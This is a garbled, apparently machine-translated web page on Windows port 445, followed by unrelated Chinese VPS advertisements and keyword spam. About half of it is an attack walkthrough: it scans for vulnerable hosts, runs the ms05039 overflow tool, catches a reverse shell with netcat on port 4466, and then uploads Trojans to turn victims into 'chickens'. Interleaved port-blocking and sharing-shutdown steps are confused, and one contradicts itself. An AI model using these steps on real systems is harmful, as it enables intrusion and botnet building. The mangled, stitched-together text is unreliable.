端口445端口(445 port)

445端口  时间:2021-04-18  阅读:()

445端口 445 port

Teach you 445 port attacks and prevention:

The 445 port is a port to get both praise and blame it, we caneasily access a variety of LAN in a shared folder or printersharing, but it is also because of it, hackers have a chance,they can pass through the port secretly sharing your hard drive,or even fall in your hard disk will be silent! What we can dois to think of away that hackers can take advantage of, blockingthe 445 port holes. For simplicity, in this paper, we takeWindows 2000 as an example, for Windows XP, the steps arebasically similar.

In the first step, what we need to do is to identify ahost with445 port vulnerabilities. You can scan it with scanning tools!SUPERSCAN, for example, is a port scanning tool.

The second step, assuming that we now have a host with a 445port vulnerability, we can use the Swiss Army knife NC and theoverflow tool ms05039 to attack:

F:\445>ms05039 target IP local IP 1234

. . . . . .

. . . . . .

F:\445>nc. exe -vv -l -p 1234

. . . . . .

. . . . . .

If you succeed, you will return to a shell, and then you canuse our usual commands. For example, let him download our Trojanhorse or upload a Trojan horse to him, and then run, so get achicken.

Do you think your computer is dangerous?Don't be afraid. Herewe are to remove this dangerous 445 port vulnerability:Attack methods against 445 port vulnerabilities:

1. port exclusion method

This method uses the port exclusion function of Windows 2000system, all packets from the 445 port will be banned

The evil guys can't get close to your mainframe, and here' s theconcrete implementation of this approach:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page, select the "Internet Protocol"(TCP/IP) item, and then click the "property" button to open the

Internet (TCP/IP) property settings page;

Click the page in the "advanced" button, open the advancedTCP/IP settings window, select the "options" label, and labelsin the pages of the "optional settings", "TCP/IP screen" isselected, and then click the "properties" button, open the TCP/IP screening set port;

The 445 port belongs to a TCP port, you can set at thecorresponding port "TCP", will "allow only" of selectedactivation following the "add" button, click the button in thewindow open by the add filter ", the service port number willmust be used, add come in, and will be less than the 445 portnumber excluded, after setting, click"OK"button, you can maketo take effect.

2. service shutdown method

Taking into account the folder or printer sharing service willuse to port 445, so directly to the folder or printer sharingservice stop, canalso realize the closure of 445 port to allowhackers to destroy all kinds of shared resources, the followingare the specific steps to close the folder or printer sharingservice:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,

select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page,

And in"this connectionuses the following selected components"list box, the "Microsoft network file or printer sharing"option before the cancellation number canceled, as shown infigure 2. Finally, click the "OK"button to restart the system,and the "big villains" on Internet have no access to all kindsof shared resources.

Of course, you can not stop sharing service conditions,deprivedof"sharedaccess rights are thewicked"; use the localsecurity settings in the user rights assignment function,specify anyusers on Internet have the right to access the localhost specific steps:

In the Windows 2000 start menu system, click the "program" and"management tools" and "local security settings" option, andthen expand the security settings "and" local policy "" userrights assignment "folder in the corresponding right sub windowto select"deny access to this computer from the network"option,and with the mouse left click on the;

Open the settings window, click the Add button, the pop-up"select auser or group dialog box, select the" everyone"option,and then click the Add button, finally click" OK", so that anyone user can access from the network to the local host.First look for chickens with MS05-039 vulnerabilities, and the

bugs open 445 and 139 ports,

Scan with a scanner

Next, exploit a vulnerability tool to attack a remotecalculator

Open the command prompt and enter ms05039. exe 192. 168.0.3

192. 168.0. 2 44661

Mean: 192. 168.0. 3 chicken IP address, 192. 168.0.2 is the localIP address, 4466 successful remote computing data overflowchicken will be connected to port 4466 on the local computer,1 on behalf of the remote chicken is Chinese version, Englishset 0. When successful execution of remote data overflowoperation, there will be a hint of successful overflow, suchas:

Trying to connect to remote port on 192. 168.0.3:445. . .ESTABLI SHED

Maki ng, nul l, se ssi on. . . OK

Trying, to, bind, pipe. . . OK

Trying, to, send, craf ted, packet. . . OK

Exploit done! Check your reverse shell on 192. 168.0.2:4466When the overflow is successful, immediately use NC (called theSwiss Army knife) to monitor the data that bounces back to the

4466 port of the machine.

Restart a command prompt, enter the command: NC -vv (two V) -l-p 4466 for data monitoring,

It will soon be able to monitor a remote SHELL withadministrator privileges.

So far, it has successfully entered the remote chicken system.At this time, you can upload Trojan horses through FTP, TFTP,etc.

Puaex:香港vds,wtt套餐,G口带宽不限流量;可解流媒体,限量补货

puaex怎么样?puaex是一家去年成立的国人商家,本站也分享过几次,他家主要销售香港商宽的套餐,给的全部为G口带宽,而且是不限流量的,目前有WTT和HKBN两种线路的方面,虽然商家的价格比较贵,但是每次补一些货,就会被抢空,之前一直都是断货的状态,目前商家进行了补货,有需要这种类型机器的朋友可以入手。点击进入:puaex商家官方网站Puaex香港vds套餐:全部为KVM虚拟架构,G口的带宽,可...

VoLLcloud6折限量,香港CMI云服务器三网直连-200M带宽

vollcloud LLC首次推出6折促销,本次促销福利主要感恩与回馈广大用户对于我们的信任与支持,我们将继续稳步前行,为广大用户们提供更好的产品和服务,另外,本次促销码共限制使用30个,个人不限购,用完活动结束,同时所有vps产品支持3日内无条件退款和提供免费试用。需要了解更多产品可前往官网查看!vollcloud优惠码:VoLLcloud终生6折促销码:Y5C0V7R0YW商品名称CPU内存S...

DiyVM(50元起)老牌商家,香港沙田CN2直连vps/不限流量/五折终身优惠

diyvm怎么样?diyvm是一家国内成立时间比较久的主机商家了,大约在6年前站长曾经用过他家的美国机房的套餐,非常稳定,适合做站,目前商家正在针对香港沙田机房的VPS进行促销,给的是五折优惠,续费同价,香港沙田机房走的是CN2直连的线路,到大陆地区的速度非常好,DiyVM商家采用小带宽不限流量的形式,带宽2Mbps起步,做站完全够用,有需要的朋友可以入手。diyvm优惠码:五折优惠码:OFF50...

445端口为你推荐
投资者适当性客户端系统FDCphp敬请参阅报告结尾处免责声明127.0.0.1传奇服务器非法网关连接: 127.0.0.1fusionchartsFusionCharts连接数据库你是怎么解决的,能告诉我吗?谢谢啦联通版iphone4s怎么区分iphone4s电信版和联通版phpemptyPHP~~什么时候用isset 什么时候用emptygoogle统计怎样获得google ga 统计代码morphvoxpro怎么用如何使用MorphVOX Pro变声android5.1安卓N是什么东西??和普通的安卓系统(例如安卓5.1)有什么区别?
网站服务器租用 猫咪av永久最新域名 北京域名注册 广州主机租用 59.99美元 嘉洲服务器 数字域名 柚子舍官网 速度云 服务器托管什么意思 银盘服务 外贸空间 双线空间 云服务是什么意思 密钥索引 xshell5注册码 聚惠网 windowsserver2008 cc加速器 报警主机 更多